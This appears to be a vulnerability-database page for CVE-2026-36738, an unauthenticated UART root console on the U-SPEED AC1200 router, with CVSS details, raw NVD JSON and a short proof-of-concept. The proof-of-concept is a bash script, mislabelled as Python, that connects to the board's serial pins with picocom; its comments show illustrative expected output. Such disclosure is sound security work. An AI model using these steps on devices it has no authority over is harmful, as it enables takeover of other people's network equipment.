CVE-2026-36738

Description

U-SPEED AC1200 Gigabit Wi-Fi Router (Model: T18-21K) V1.0 is vulnerable to Incorrect Access Control. The device exposes a UART interface that lacks authentication, authorization, or access control mechanisms. An attacker with physical access to the UART pins can connect to the interface and gain unrestricted access to device functionality.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

U-SPEED AC1200 Gigabit Wi-Fi Router (Model: T18-21K) V1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-36738: UART Access on U-SPEED AC1200 Router
# Requirements: USB-to-TTL Serial Cable, picocom/minicom
# 
# 1. Identify UART pins (TX, RX, GND) on the device PCB.
# 2. Connect USB-to-TTL cable: GND->GND, RX->TX, TX->RX.
# 3. Determine baud rate (commonly 115200 for IoT devices).

BAUD_RATE=115200
SERIAL_PORT="/dev/ttyUSB0" # Adjust based on your OS

echo "[+] Connecting to UART interface at $BAUD_RATE baud..."

# Using picocom to connect (install via: apt-get install picocom)
picocom -b $BAUD_RATE $SERIAL_PORT

# Expected Result:
# A terminal shell should appear immediately without password prompt.
# Example output:
# U-Boot 1.1.3 (Jan 1 2026 - 00:00:00)
# ... (Boot messages) ...
# root@U-SPEED:/#

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-36738
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-36738
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-36738/
[4] VulDB https://vuldb.com/cve/CVE-2026-36738
[5] https://github.com/N0tMilk/vulnerability-research
[6] https://github.com/N0tMilk/vulnerability-research/tree/main/IoT/CVE-2026-36738
[7] https://github.com/N0tMilk/vulnerability-research/tree/main/IoT/CVE-2026-36738

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-36738", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:40.707", "lastModified": "2026-05-14T15:16:45.500", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "U-SPEED AC1200 Gigabit Wi-Fi Router (Model: T18-21K) V1.0 is vulnerable to Incorrect Access Control. The device exposes a UART interface that lacks authentication, authorization, or access control mechanisms. An attacker with physical access to the UART pins can connect to the interface and gain unrestricted access to device functionality."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/N0tMilk/vulnerability-research", "source": "[email protected]"}, {"url": "https://github.com/N0tMilk/vulnerability-research/tree/main/IoT/CVE-2026-36738", "source": "[email protected]"}, {"url": "https://github.com/N0tMilk/vulnerability-research/tree/main/IoT/CVE-2026-36738", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}